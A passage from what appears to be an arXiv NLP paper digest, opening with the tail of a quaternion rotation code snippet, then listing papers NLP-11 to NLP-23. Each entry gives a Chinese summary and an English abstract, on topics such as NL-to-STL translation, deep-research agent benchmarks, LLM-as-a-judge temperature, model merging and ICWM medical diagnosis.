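    return qmul(qmul(q_left, v), conj(q_right))

qL = normalize((1.0, 2.0, -1.0, 0.5))
qR = normalize((0.3, -0.7, 0.2, 1.1))
v = (0.4, -1.2, 2.0, 0.8)
rv = so4_rotate(v, qL, qR)
# A rotation preserves the Euclidean norm of each 4D block.
assert abs(sum(c * c for c in rv) - sum(c * c for c in v)) < 1e-9
```

Dropping one of the two factors (e.g., fixing q_R to the identity) gives the single-isoclinic "Fast" variant at roughly half the multiply count.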
[NLP-11] Structural-Ambiguity-Aware Translation from Natural Language to Signal Temporal Logic
[Quick Read]: This paper addresses the unreliable mapping in automatic translation from natural language (NL) to Signal Temporal Logic (STL) caused by the structural ambiguity of NL. Existing methods force a single syntactic analysis at the parsing stage, ignoring the multiple plausible interpretations an NL input may admit, which limits the accuracy and coverage of formal task specifications. The key idea is an ambiguity-preserving translation method: rather than disambiguating at parse time, a three-stage pipeline based on Combinatory Categorial Grammar (CCG), consisting of ambiguity-preserving n-best parsing, STL-oriented template-based semantic composition, and canonicalization with score aggregation, outputs a deduplicated set of STL candidate formulas with interpretable plausibility scores, explicitly modelling and preserving the ambiguity of the original instruction.
Link: https://arxiv.org/abs/2603.28426
Authors: Kosei Fushimi, Kazunobu Serizawa, Junya Ikemoto, Kazumune Hashimoto
Affiliations: The University of Osaka
Categories: Computation and Language (cs.CL); Symbolic Computation (cs.SC)
Comments:
Abstract:Signal Temporal Logic (STL) is widely used to specify timed and safety-critical tasks for cyber-physical systems, but writing STL formulas directly is difficult for non-expert users. Natural language (NL) provides a convenient interface, yet its inherent structural ambiguity makes one-to-one translation into STL unreliable. In this paper, we propose an \textitambiguity-preserving method for translating NL task descriptions into STL candidate formulas. The key idea is to retain multiple plausible syntactic analyses instead of forcing a single interpretation at the parsing stage. To this end, we develop a three-stage pipeline based on Combinatory Categorial Grammar (CCG): ambiguity-preserving n -best parsing, STL-oriented template-based semantic composition, and canonicalization with score aggregation. The proposed method outputs a deduplicated set of STL candidates with plausibility scores, thereby explicitly representing multiple possible formal interpretations of an ambiguous instruction. In contrast to existing one-best NL-to-logic translation methods, the proposed approach is designed to preserve attachment and scope ambiguity. Case studies on representative task descriptions demonstrate that the method generates multiple STL candidates for genuinely ambiguous inputs while collapsing unambiguous or canonically equivalent derivations to a single STL formula.
[NLP-12] LombardoGraphia: Automatic Classification of Lombard Orthography Variants LREC2026
[Quick Read]: This paper addresses the lack of a unified orthographic standard for Lombard, a language variety spoken in Northern Italy and Southern Switzerland, which hampers the development of natural language processing (NLP) resources and model training. The key contribution is the first study of automatic Lombard orthography classification, together with LombardoGraphia, a corpus of 11,186 Lombard Wikipedia samples tagged across 9 orthographic variants, and 24 traditional and neural classification models trained to identify the variants automatically. The work provides crucial infrastructure for building variety-aware NLP resources for Lombard.
Link: https://arxiv.org/abs/2603.28418
Authors: Edoardo Signoroni, Pavel Rychlý
Affiliations: Unknown
Categories: Computation and Language (cs.CL)
Comments: To be published at LREC 2026
Abstract:Lombard, an underresourced language variety spoken by approximately 3.8 million people in Northern Italy and Southern Switzerland, lacks a unified orthographic standard. Multiple orthographic systems exist, creating challenges for NLP resource development and model training. This paper presents the first study of automatic Lombard orthography classification and LombardoGraphia, a curated corpus of 11,186 Lombard Wikipedia samples tagged across 9 orthographic variants, and models for automatic orthography classification. We curate the dataset, processing and filtering raw Wikipedia content to ensure text suitable for orthographic analysis. We train 24 traditional and neural classification models with various features and encoding levels. Our best models achieve 96.06% and 85.78% overall and average class accuracy, though performance on minority classes remains challenging due to data imbalance. Our work provides crucial infrastructure for building variety-aware NLP resources for Lombard.
[NLP-13] MiroEval: Benchmarking Multimodal Deep Research Agents in Process and Outcome
[Quick Read]: This paper addresses key shortcomings in evaluating deep research systems: existing benchmarks mostly score final reports against fixed rubrics and ignore the quality of the research process itself; most lack multimodal coverage, rely on synthetic tasks that do not reflect the complexity of real user needs, and cannot be refreshed as knowledge evolves. The proposed MiroEval is a benchmark and evaluation framework built from 100 real-user tasks (70 text-only, 30 multimodal), constructed via a dual-path pipeline that supports periodic updates, enabling a live evaluation setting. It evaluates along three complementary dimensions: adaptive synthesis quality with task-specific rubrics, agentic factuality verification via active retrieval and reasoning over sources, and process-centric evaluation that audits how a system searches, reasons, and refines. Empirically, the three dimensions reveal distinct capability profiles across systems, process quality reliably predicts overall outcomes, and performance drops substantially on multimodal tasks, highlighting a key challenge for future work.
Link: https://arxiv.org/abs/2603.28407
Authors: Fangda Ye, Yuxin Hu, Pengxiang Zhu, Yibo Li, Ziqi Jin, Yao Xiao, Yibo Wang, Lei Wang, Zhen Zhang, Lu Wang, Yue Deng, Bin Wang, Yifan Zhang, Liangcai Su, Xinyu Wang, He Zhao, Chen Wei, Qiang Ren, Bryan Hooi, An Bo, Shuicheng Yan, Lidong Bing
Affiliations: Unknown
Categories: Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
Comments: GitHub: this https URL
Abstract:Recent progress in deep research systems has been impressive, but evaluation still lags behind real user needs. Existing benchmarks predominantly assess final reports using fixed rubrics, failing to evaluate the underlying research process. Most also offer limited multimodal coverage, rely on synthetic tasks that do not reflect real-world query complexity, and cannot be refreshed as knowledge evolves. To address these gaps, we introduce MiroEval, a benchmark and evaluation framework for deep research systems. The benchmark comprises 100 tasks (70 text-only, 30 multimodal), all grounded in real user needs and constructed via a dual-path pipeline that supports periodic updates, enabling a live and evolving setting. The proposed evaluation suite assesses deep research systems along three complementary dimensions: adaptive synthesis quality evaluation with task-specific rubrics, agentic factuality verification via active retrieval and reasoning over both web sources and multimodal attachments, and process-centric evaluation audits how the system searches, reasons, and refines throughout its investigation. Evaluation across 13 systems yields three principal findings: the three evaluation dimensions capture complementary aspects of system capability, with each revealing distinct strengths and weaknesses across systems; process quality serves as a reliable predictor of overall outcome while revealing weaknesses invisible to output-level metrics; and multimodal tasks pose substantially greater challenges, with most systems declining by 3 to 10 points. The MiroThinker series achieves the most balanced performance, with MiroThinker-H1 ranking the highest overall in both settings. Human verification and robustness results confirm the reliability of the benchmark and evaluation framework. MiroEval provides a holistic diagnostic tool for the next generation of deep research agents.
[NLP-14] Marco DeepResearch: Unlocking Efficient Deep Research Agents via Verification-Centric Design
[Quick Read]: This paper addresses error propagation in deep research agents on long-horizon tasks caused by the lack of explicit verification mechanisms: in existing paradigms, errors introduced during QA data synthesis, trajectory construction, and test-time scaling accumulate downstream and degrade agent performance. The key solution is a verification-centric framework design at three levels: (1) verification in QA data synthesis to control question difficulty and ensure answers are unique and correct; (2) verification-driven trajectory synthesis that injects explicit verification patterns into training trajectories; and (3) test-time scaling that uses the agent itself as a verifier, markedly improving performance on hard questions. Experiments show that the resulting 8B-scale agent surpasses or approaches several 30B-scale models on challenging benchmarks such as BrowseComp.
Link: https://arxiv.org/abs/2603.28376
Authors: Bin Zhu, Qianghuai Jia, Tian Lan, Junyang Ren, Feng Gu, Feihu Jiang, Longyue Wang, Zhao Xu, Weihua Luo
Affiliations: Alibaba International Digital Commerce
Categories: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
Comments:
Abstract: Deep research agents autonomously conduct open-ended investigations, integrating complex information retrieval with multi-step reasoning across diverse sources to solve real-world problems. To sustain this capability on long-horizon tasks, reliable verification is critical during both training and inference. A major bottleneck in existing paradigms stems from the lack of explicit verification mechanisms in QA data synthesis, trajectory construction, and test-time scaling. Errors introduced at each stage propagate downstream and degrade the overall agent performance. To address this, we present Marco DeepResearch, a deep research agent optimized with a verification-centric framework design at three levels: (1) QA Data Synthesis: we introduce verification mechanisms to graph-based and agent-based QA synthesis to control question difficulty while ensuring answers are unique and correct; (2) Trajectory Construction: we design a verification-driven trajectory synthesis method that injects explicit verification patterns into training trajectories; and (3) Test-time Scaling: we use Marco DeepResearch itself as a verifier at inference time and effectively improve performance on challenging questions. Extensive experimental results demonstrate that our proposed Marco DeepResearch agent significantly outperforms 8B-scale deep research agents on most challenging benchmarks, such as BrowseComp and BrowseComp-ZH. Crucially, under a maximum budget of 600 tool calls, Marco DeepResearch even surpasses or approaches several 30B-scale agents, like Tongyi DeepResearch-30B.
[NLP-15] Not All Subjectivity Is the Same! Defining Desiderata for the Evaluation of Subjectivity in NLP
[Quick Read]: This position paper addresses the misalignment between current natural language processing (NLP) evaluation practice and the goals of subjectivity-sensitive models, whose intent to reflect diverse perspectives and surface marginalized voices is not adequately captured by existing evaluations. The key contribution is seven evaluation desiderata for subjectivity-sensitive models, grounded in how subjectivity is represented in NLP data and models, constructed in a top-down manner with user-centric impact in mind. A scan of the experimental setups of 60 papers shows that several aspects of subjectivity remain understudied, including the distinction between ambiguous and polyphonic input, whether subjectivity is effectively conveyed to the user, and the interplay between the desiderata.
Link: https://arxiv.org/abs/2603.28351
Authors: Urja Khurana, Michiel van der Meer, Enrico Liscio, Antske Fokkens, Pradeep K. Murukannaiah
Affiliations: Unknown
Categories: Computation and Language (cs.CL)
Comments: Under review
Abstract:Subjective judgments are part of several NLP datasets and recent work is increasingly prioritizing models whose outputs reflect this diversity of perspectives. Such responses allow us to shed light on minority voices, which are frequently marginalized or obscured by dominant perspectives. It remains a question whether our evaluation practices align with these models’ objectives. This position paper proposes seven evaluation desiderata for subjectivity-sensitive models, rooted in how subjectivity is represented in NLP data and models. The desiderata are constructed in a top-down approach, keeping in mind the user-centric impact of such models. We scan the experimental setup of 60 papers and show that various aspects of subjectivity are still understudied: the distinction between ambiguous and polyphonic input, whether subjectivity is effectively expressed to the user, and a lack of interplay between different desiderata, amongst other gaps.
[NLP-16] Kernel-Smith: A Unified Recipe for Evolutionary Kernel Optimization
[Quick Read]: This paper addresses efficiency and generality in automated generation of high-performance GPU kernels and operators, in particular transferable optimization across complex heterogeneous platforms. The key innovations of the Kernel-Smith framework are: (1) a stable evaluation-driven evolutionary agent that maintains a population of executable candidates and iterates using structured execution feedback on compilation, correctness, and speedup; and (2) an evolution-oriented post-training recipe that converts long-horizon evolution trajectories into step-centric supervision and reinforcement-learning signals, so the model acts as a local improver within the evolutionary loop rather than a one-shot generator. This design markedly improves generated-kernel quality and convergence stability, achieves results surpassing frontier proprietary models on heterogeneous platforms including NVIDIA Triton and MetaX MACA, and demonstrates that LLM-driven kernel optimization can transfer from benchmarks to production systems such as SGLang and LMDeploy.
Link: https://arxiv.org/abs/2603.28342
Authors: He Du, Qiming Ge, Jiakai Hu, Aijun Yang, Zheng Cai, Zixian Huang, Sheng Yuan, Qinxiu Cheng, Xinchen Xie, Yicheng Chen, Yining Li, Jiaxing Xie, Huanan Dong, Yaguang Wu, Xiangjun Huang, Jian Yang, Hui Wang, Bowen Zhou, Bowen Li, Qipeng Guo, Kai Chen
Affiliations: Shanghai AI Laboratory; Fudan University; MetaX
Categories: Computation and Language (cs.CL); Machine Learning (cs.LG)
Comments:
Abstract:We present Kernel-Smith, a framework for high-performance GPU kernel and operator generation that combines a stable evaluation-driven evolutionary agent with an evolution-oriented post-training recipe. On the agent side, Kernel-Smith maintains a population of executable candidates and iteratively improves them using an archive of top-performing and diverse programs together with structured execution feedback on compilation, correctness, and speedup. To make this search reliable, we build backend-specific evaluation services for Triton on NVIDIA GPUs and Maca on MetaX GPUs. On the training side, we convert long-horizon evolution trajectories into step-centric supervision and reinforcement learning signals by retaining correctness-preserving, high-gain revisions, so that the model is optimized as a strong local improver inside the evolutionary loop rather than as a one-shot generator. Under a unified evolutionary protocol, Kernel-Smith-235B-RL achieves state-of-the-art overall performance on KernelBench with Nvidia Triton backend, attaining the best average speedup ratio and outperforming frontier proprietary models including Gemini-3.0-pro and Claude-4.6-opus. We further validate the framework on the MetaX MACA backend, where our Kernel-Smith-MACA-30B surpasses large-scale counterparts such as DeepSeek-V3.2-think and Qwen3-235B-2507-think, highlighting potential for seamless adaptation across heterogeneous platforms. Beyond benchmark results, the same workflow produces upstream contributions to production systems including SGLang and LMDeploy, demonstrating that LLM-driven kernel optimization can transfer from controlled evaluation to practical deployment.
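The evaluation-driven evolutionary loop described above, maintain an archive of top candidates, mutate an archive member, score it, and keep the best, can be sketched generically. Everything concrete here (integer-vector "programs", the toy fitness function) is a stand-in for LLM-revised kernels scored by compilation, correctness, and speedup:

```python
import random

def evolve(seed, mutate, evaluate, population_size=8, steps=400):
    """Minimal archive-based evolutionary search.

    The archive keeps the top-scoring candidates; each step picks a
    random archive member, proposes a revision, scores it, and prunes
    back to the population size (an illustrative stand-in for the
    paper's agentic loop, not its actual implementation).
    """
    rng = random.Random(0)
    archive = [(evaluate(seed), seed)]
    for _ in range(steps):
        _, parent = archive[rng.randrange(len(archive))]
        child = mutate(parent, rng)
        archive.append((evaluate(child), child))
        archive.sort(key=lambda t: -t[0])   # best score first
        del archive[population_size:]       # retain top performers
    return archive[0]

# Toy problem: fitness is negative L1 distance to a target vector.
target = [3, 1, 4, 1, 5]
def mutate(p, rng):
    q = list(p)
    q[rng.randrange(len(q))] += rng.choice([-1, 1])
    return q

score, best = evolve([0, 0, 0, 0, 0], mutate,
                     lambda p: -sum(abs(a - b) for a, b in zip(p, target)))
assert score > -sum(target)  # strictly better than the seed's fitness
```

In Kernel-Smith's setting the "mutate" step is an LLM revision conditioned on execution feedback, and the retained revisions double as post-training supervision.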
[NLP-17] The Necessity of Setting Temperature in LLM-as-a-Judge
【速读】: 该论文旨在解决大语言模型(Large Language Model, LLM)作为评判者(LLM-as-a-Judge)在文本质量与事实正确性评估中,温度(temperature)参数设置对评判性能影响不明确的问题。现有实践中普遍采用固定温度值(如0.1和1.0),但缺乏理论依据且未考虑任务依赖性。解决方案的关键在于通过一系列受控实验系统性地探究温度与评判性能之间的关系,并引入因果推断框架对温度对评判行为的直接因果效应进行严谨统计分析,从而为基于LLM的评估流水线设计提供可操作的工程洞见。
链接: https://arxiv.org/abs/2603.28304
作者: Lujun Li,Lama Sleem,Yangjie Xu,Yewei Song,Aolin Jia,Jerome Francois,Radu State
机构: University of Luxembourg (卢森堡大学); ETH Zürich (苏黎世联邦理工学院)
类目: Computation and Language (cs.CL)
备注:
Abstract: LLM-as-a-Judge has emerged as an effective and low-cost paradigm for evaluating text quality and factual correctness. Prior studies have shown substantial agreement between LLM judges and human experts, even on tasks that are difficult to assess automatically. In practice, researchers commonly employ fixed temperature configurations during evaluation, with values of 0.1 and 1.0 being the most prevalent choices, a convention that is largely empirical rather than principled. However, recent research suggests that LLM performance exhibits non-trivial sensitivity to temperature settings, that lower temperatures do not universally yield optimal outcomes, and that such effects are highly task-dependent. This raises a critical research question: does temperature influence judge performance in LLM-centric evaluation? To address this, we systematically investigate the relationship between temperature and judge performance through a series of controlled experiments, and further adopt a causal inference framework within our empirical statistical analysis to rigorously examine the direct causal effect of temperature on judge behavior, offering actionable engineering insights for the design of LLM-centric evaluation pipelines.
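The mechanism by which temperature changes judge behavior is the usual logit rescaling before softmax: low temperature concentrates probability on the top verdict, high temperature spreads it, so sampled judgments vary more between runs. A minimal illustration at the two conventional settings (the logits are made-up judge scores for three verdicts):

```python
import math

def softmax_with_temperature(logits, t):
    """Distribution over outputs at temperature t: dividing logits by t
    sharpens the distribution toward the argmax when t < 1 and flattens
    it toward uniform when t > 1."""
    scaled = [x / t for x in logits]
    m = max(scaled)                      # subtract max for stability
    exps = [math.exp(x - m) for x in scaled]
    z = sum(exps)
    return [e / z for e in exps]

logits = [2.0, 1.0, 0.5]                 # hypothetical scores for verdicts A/B/C
cold = softmax_with_temperature(logits, 0.1)
hot = softmax_with_temperature(logits, 1.0)
# At t=0.1 the top verdict takes nearly all probability mass; at t=1.0
# the alternatives retain noticeable mass, so sampled verdicts fluctuate.
assert cold[0] > 0.99
assert hot[0] < 0.7
```

Whether the sharper or the noisier regime yields better agreement with human raters is exactly the task-dependent question the paper studies empirically.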
[NLP-18] Merge and Conquer: Instructing Multilingual Models by Adding Target Language Weights LREC2026
[Quick Read]: This paper addresses the weak performance of Large Language Models (LLMs) in low-resource languages, where high-quality instruction data is scarce and compute budgets are tight. Traditional adaptation via continual pre-training or instruction tuning is often infeasible because it depends on substantial compute and curated instruction data. The key solution is model merging: fusing an instruction-tuned general model with a language-specific base model yields instruction-following ability in the new language without repeated instruction tuning, and even supports multilingual capability by combining multiple language-specific models. Experiments on four Iberian languages (Basque, Catalan, Galician, and Spanish) and two model families show effective instruction following at greatly reduced computational cost, validating merging as an efficient alternative for low-resource language adaptation.
Link: https://arxiv.org/abs/2603.28263
Authors: Eneko Valero, Maria Ribalta i Albado, Oscar Sainz, Naiara Perez, German Rigau
Affiliations: Unknown
Categories: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
Comments: This paper was accepted at the 15th edition of the Language Resources and Evaluation Conference (LREC 2026)
Abstract:Large Language Models (LLMs) remain heavily centered on English, with limited performance in low-resource languages. Existing adaptation approaches, such as continual pre-training, demand significant computational resources. In the case of instructed models, high-quality instruction data is also required, both of which are often inaccessible for low-resource language communities. Under these constraints, model merging offers a lightweight alternative, but its potential in low-resource contexts has not been systematically explored. In this work, we explore whether it is possible to transfer language knowledge to an instruction-tuned LLM by merging it with a language-specific base model, thereby eliminating the need of language-specific instructions and repeated fine-tuning processes whenever stronger instructed variants become available. Through experiments covering four Iberian languages (Basque, Catalan, Galician, and Spanish) and two model families, we show that merging enables effective instruction following behavior in new languages and even supports multilingual capability through the combination of multiple language-specific models. Our results indicate that model merging is a viable and efficient alternative to traditional adaptation methods for low-resource languages, achieving competitive performance while greatly reducing computational cost.
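One common family of merging schemes that matches this description, adding target-language weights to an instruction-tuned model, is task arithmetic over a shared base. The sketch below is one possible such recipe under that assumption, not necessarily the paper's exact method:

```python
import numpy as np

def merge_language_skill(w_instruct, w_base, w_lang_base, alpha=1.0):
    """Add a target-language "delta" to instruction-tuned weights.

    Task-arithmetic-style merge (an illustrative assumption): the
    language skill is the difference between a language-adapted base
    model and the original base, scaled by alpha and added to the
    instructed weights. Applied per weight tensor in practice.
    """
    return w_instruct + alpha * (w_lang_base - w_base)

rng = np.random.default_rng(0)
w_base = rng.standard_normal((4, 4))
w_instruct = w_base + 0.1   # stand-in for the instruction-tuning shift
w_lang = w_base + 0.2       # stand-in for the language-adaptation shift
merged = merge_language_skill(w_instruct, w_base, w_lang)
# The merged weights carry both shifts relative to the shared base.
assert np.allclose(merged, w_base + 0.3)
```

Multilingual merging follows the same pattern by summing several language deltas, which is how combining multiple language-specific models becomes possible without any further fine-tuning.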
[NLP-19] Coconstructions in spoken data: UD annotation guidelines and first results
[Quick Read]: This paper addresses the annotation of syntactic dependencies that span speaker turns, covering collaborative coconstructions proper, wh-question answers, and backchannels, which lack a standardized representation in spoken-language treebanks. The key solution proposes two complementary representations: a speaker-based representation that follows the segmentation into speech turns, and a dependency-based representation that allows dependencies across turns. New criteria are also put forward to distinguish reformulations from repairs and to explicitly annotate elements in unfinished phrases, improving the expressiveness and consistency of spoken treebanks within the Universal Dependencies framework.
Link: https://arxiv.org/abs/2603.28261
Authors: Ludovica Pannitto, Sylvain Kahane, Kaja Dobrovoljc, Elena Battaglia, Bruno Guillaume, Caterina Mauri, Eleonora Zucchini
Affiliations: Unknown
Categories: Computation and Language (cs.CL)
Comments:
Abstract:The paper proposes annotation guidelines for syntactic dependencies that span across speaker turns - including collaborative coconstructions proper, wh-question answers, and backchannels - in spoken language treebanks within the Universal Dependencies framework. Two representations are proposed: a speaker-based representation following the segmentation into speech turns, and a dependency-based representation with dependencies across speech turns. New propositions are also put forward to distinguish between reformulations and repairs, and to promote elements in unfinished phrases.
[NLP-20] Categorical Perception in Large Language Model Hidden States: Structural Warping at Digit-Count Boundaries
【速读】: 该论文旨在解决大语言模型(Large Language Models, LLMs)在处理阿拉伯数字时是否存在类范畴知觉(Categorical Perception, CP)现象的问题,即模型内部表征是否在结构边界处(如10和100)表现出几何畸变,从而增强对类别边界的区分能力。解决方案的关键在于通过对来自五个架构家族的六个LLM进行表征相似性分析(Representational Similarity Analysis, RSA),发现一种“CP加性模型”(log-distance加上边界增强项)比纯连续模型更准确地拟合了所有主层的表征几何结构;此外,研究识别出两类CP模式:一类是“经典CP”(如Gemma、Qwen),模型既显式分类又呈现几何畸变;另一类是“结构CP”(如Llama、Mistral、Phi),仅在边界处出现几何畸变但无法报告类别差异。这一结果表明,输入格式的结构性断点(如数字位数跃迁)足以独立于语义类别知识,在LLM中诱发类范畴知觉的几何特征。
链接: https://arxiv.org/abs/2603.28258
作者: Jon-Paul Cacioli
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 25 pages, 5 figures, 7 tables. Pre-registered on OSF ( this http URL ). Code at this https URL
Abstract:Categorical perception (CP) – enhanced discriminability at category boundaries – is among the most studied phenomena in perceptual psychology. This paper reports that analogous geometric warping occurs in the hidden-state representations of large language models (LLMs) processing Arabic numerals. Using representational similarity analysis across six models from five architecture families, the study finds that a CP-additive model (log-distance plus a boundary boost) fits the representational geometry better than a purely continuous model at 100% of primary layers in every model tested. The effect is specific to structurally defined boundaries (digit-count transitions at 10 and 100), absent at non-boundary control positions, and absent in the temperature domain where linguistic categories (hot/cold) lack a tokenisation discontinuity. Two qualitatively distinct signatures emerge: “classic CP” (Gemma, Qwen), where models both categorise explicitly and show geometric warping, and “structural CP” (Llama, Mistral, Phi), where geometry warps at the boundary but models cannot report the category distinction. This dissociation is stable across boundaries and is a property of the architecture, not the stimulus. Structural input-format discontinuities are sufficient to produce categorical perception geometry in LLMs, independently of explicit semantic category knowledge.
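论文中提到的“CP 加性模型”(log 距离加上边界增强项)可以用一个简单的最小二乘拟合来示意。下面是一个假设性的简化实现(函数名、单一边界的设定均为本文示意,并非论文官方代码;论文实际在 10 和 100 两处边界上检验):

```python
import numpy as np

def fit_cp_additive(numbers, dissim, boundary=10):
    """用最小二乘拟合 CP 加性模型:
        d(i, j) ≈ a * log(|n_i - n_j| + 1) + b * [n_i, n_j 跨越边界] + c
    其中 dissim[i][j] 为两数字隐藏状态表示的不相似度(如 1 - cosine)。
    返回 [a, b, c];若 b 显著大于 0,即表征在边界处被“拉开”。"""
    X, y = [], []
    n = len(numbers)
    for i in range(n):
        for j in range(i + 1, n):
            log_dist = np.log(abs(numbers[i] - numbers[j]) + 1)
            # 边界项:两个数字是否分别落在边界(如 10)两侧
            crosses = float((numbers[i] < boundary) != (numbers[j] < boundary))
            X.append([log_dist, crosses, 1.0])
            y.append(dissim[i][j])
    coef, *_ = np.linalg.lstsq(np.array(X), np.array(y), rcond=None)
    return coef
```

按论文思路,可将拟合优度与去掉边界项的纯连续模型(仅 log 距离加常数)比较,判断某一层是否存在“边界增强”。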
[NLP-21] Versteasch du mi? Computational and Socio-Linguistic Perspectives on GenAI LLMs and Non-Standard Language
【速读】: 该论文旨在解决生成式 AI(Generative AI)在语言模型设计中对非标准语言变体的忽视问题,进而加剧数字语言鸿沟与语言认知霸权的现状。其核心问题是:如何在技术上使大型语言模型(Large Language Models, LLMs)更好地处理非标准语言变体,并探讨这一改进是否以及在何种条件下能够支持“民主化和去殖民化的数字及机器学习策略”。解决方案的关键在于通过跨学科视角——结合批判性社会语言学与计算语言学——以南蒂罗尔方言和库尔德语变体为案例,系统分析语言多样性在模型训练与部署中的体现方式,并提出技术层面的适配路径与政策导向的伦理框架,从而推动更具包容性的语言技术发展。
链接: https://arxiv.org/abs/2603.28213
作者: Verena Platzgummer,John McCrae,Sina Ahmadi
机构: University of Galway (戈尔韦大学); University of Zurich (苏黎世大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:The design of Large Language Models and generative artificial intelligence has been shown to be “unfair” to less-spoken languages and to deepen the digital language divide. Critical sociolinguistic work has also argued that these technologies are not only made possible by prior socio-historical processes of linguistic standardisation, often grounded in European nationalist and colonial projects, but also exacerbate epistemologies of language as “monolithic, monolingual, syntactically standardized systems of meaning”. In our paper, we draw on earlier work on the intersections of technology and language policy and bring our respective expertise in critical sociolinguistics and computational linguistics to bear on an interrogation of these arguments. We take two different complexes of non-standard linguistic varieties in our respective repertoires–South Tyrolean dialects, which are widely used in informal communication in South Tyrol, Italy, as well as varieties of Kurdish–as starting points to an interdisciplinary exploration of the intersections between GenAI and linguistic variation and standardisation. We discuss both how LLMs can be made to deal with nonstandard language from a technical perspective, and whether, when or how this can contribute to “democratic and decolonial digital and machine learning strategies”, which has direct policy implications.
[NLP-22] Beyond Cosine Similarity: Zero-Initialized Residual Complex Projection for Aspect-Based Sentiment Analysis
【速读】: 该论文旨在解决Aspect-Based Sentiment Analysis (ABSA) 中存在的表示纠缠(representation entanglement)问题,即在实数嵌入空间中,方面语义(aspect semantics)与情感极性(sentiment polarities)常被混杂,导致细粒度情感分析性能受限;同时,标准对比学习因虚假负样本碰撞(false-negative collisions)问题,在高频方面上表现显著下降。解决方案的关键在于提出一种基于零初始化残差复数投影(Zero-Initialized Residual Complex Projection, ZRCP)的新型框架,并引入抗碰撞掩码角度损失(Anti-collision Masked Angle Loss)。该方法将文本特征映射到复数语义空间,利用相位分离情感极性,同时保持幅度编码语义强度和词汇丰富性;并通过抗碰撞掩码机制,在不破坏同极性方面内部凝聚力的前提下,将跨极性判别边界扩展超过50%,从而实现更鲁棒、精细的情感解耦。
链接: https://arxiv.org/abs/2603.28205
作者: Yijin Wang,Fandi Sun
机构: Xidian University (西安电子科技大学)
类目: Computation and Language (cs.CL)
备注:
Abstract:Aspect-Based Sentiment Analysis (ABSA) is fundamentally challenged by representation entanglement, where aspect semantics and sentiment polarities are often conflated in real-valued embedding spaces. Furthermore, standard contrastive learning suffers from false-negative collisions, severely degrading performance on high-frequency aspects. In this paper, we propose a novel framework featuring a Zero-Initialized Residual Complex Projection (ZRCP) and an Anti-collision Masked Angle Loss, inspired by quantum projection and entanglement ideas. Our approach projects textual features into a complex semantic space, systematically utilizing the phase to disentangle sentiment polarities while allowing the amplitude to encode the semantic intensity and lexical richness of subjective descriptions. To tackle the collision bottleneck, we introduce an anti-collision mask that elegantly preserves intra-polarity aspect cohesion while expanding the inter-polarity discriminative margin by over 50%. Experimental results demonstrate that our framework achieves a state-of-the-art Macro-F1 score of 0.8851. Deep geometric analyses further reveal that explicitly penalizing the complex amplitude catastrophically over-regularizes subjective representations, proving that our unconstrained-amplitude and phase-driven objective is crucial for robust, fine-grained sentiment disentanglement.
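下面用 NumPy 给出零初始化残差复数投影(ZRCP)思想的一个极简示意:残差权重零初始化,使训练起点等价于“实部为原特征、虚部为零”的恒等映射,之后由相位承载情感极性、幅度承载语义强度。类名与实现细节均为本文假设,并非论文原始代码:

```python
import numpy as np

class ZeroInitResidualComplexProjection:
    """假设性示意:把实值文本特征投影到复数语义空间。
    残差分支(W_re, W_im)零初始化,训练开始时输出恰为 h + 0j。"""

    def __init__(self, dim):
        self.W_re = np.zeros((dim, dim))  # 实部残差权重,零初始化
        self.W_im = np.zeros((dim, dim))  # 虚部残差权重,零初始化

    def __call__(self, h):
        real = h + h @ self.W_re   # 恒等映射 + 零初始化残差
        imag = h @ self.W_im
        return real + 1j * imag    # 复数表示

    @staticmethod
    def amplitude(z):
        return np.abs(z)           # 幅度:编码语义强度 / 词汇丰富性

    @staticmethod
    def phase(z):
        return np.angle(z)         # 相位:用于分离情感极性
```

训练中再以论文提出的掩码角度损失约束相位、而不惩罚幅度(按论文结论,惩罚幅度会过度正则化主观表示)。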
[NLP-23] DongYuan: An LLM -Based Framework for Integrative Chinese and Western Medicine Spleen-Stomach Disorders Diagnosis
【速读】: 该论文旨在解决整合中医与西医(Integrative Chinese and Western Medicine, ICWM)在脾-胃病诊断中面临的三大挑战:高质量数据匮乏、缺乏能够融合中医证候辨证与西医疾病诊断推理逻辑的模型,以及缺乏标准化的评估基准。解决方案的关键在于提出DongYuan框架,其核心包括三个组成部分:首先构建了三个高质量ICWM数据集(SSDF-Syndrome、SSDF-Dialogue和SSDF-PD),填补数据空白;其次开发了SSDF-Core——一个通过监督微调(Supervised Fine-Tuning, SFT)和直接偏好优化(Direct Preference Optimization, DPO)两阶段训练获得强大ICWM推理能力的诊断大语言模型;最后设计了SSDF-Navigator模块以优化临床问诊策略,并建立了SSDF-Bench评估基准用于系统性验证。实验表明,SSDF-Core在该基准上显著优于12个主流基线模型,为智能ICWM诊断系统的未来发展提供了方法论基础和技术参考。
链接: https://arxiv.org/abs/2603.28191
作者: Hua Li,Yingying Li,Xiaobin Feng,Xinyi Fu,Lifeng Dong,Qingfeng Yang,Yanzhe Chen,Xiaoju Feng,Zhidong Cao,Jianbin Guo,Yanru Du
机构: Beijing Wenge Technology Co., Ltd.(北京中科闻歌科技有限公司); Hebei Provincial Hospital of Traditional Chinese Medicine(河北省中医院); Institute of Automation, Chinese Academy of Sciences(中国科学院自动化研究所); Tianjin University(天津大学)
类目: Computation and Language (cs.CL)
备注: 13 pages, 6 figures
Abstract:The clinical burden of spleen-stomach disorders is substantial. While large language models (LLMs) offer new potential for medical applications, they face three major challenges in the context of integrative Chinese and Western medicine (ICWM): a lack of high-quality data, the absence of models capable of effectively integrating the reasoning logic of traditional Chinese medicine (TCM) syndrome differentiation with that of Western medical (WM) disease diagnosis, and the shortage of a standardized evaluation benchmark. To address these interrelated challenges, we propose DongYuan, an ICWM spleen-stomach diagnostic framework. Specifically, three ICWM datasets (SSDF-Syndrome, SSDF-Dialogue, and SSDF-PD) were curated to fill the gap in high-quality data for spleen-stomach disorders. We then developed SSDF-Core, a core diagnostic LLM that acquires robust ICWM reasoning capabilities through a two-stage training regimen of supervised fine-tuning (SFT) and direct preference optimization (DPO), and complemented it with SSDF-Navigator, a pluggable consultation navigation model designed to optimize clinical inquiry strategies. Additionally, we established SSDF-Bench, a comprehensive evaluation benchmark focused on ICWM diagnosis of spleen-stomach disorders. Experimental results demonstrate that SSDF-Core significantly outperforms 12 mainstream baselines on SSDF-Bench. DongYuan lays a solid methodological foundation and provides practical technical references for the future development of intelligent ICWM diagnostic systems.
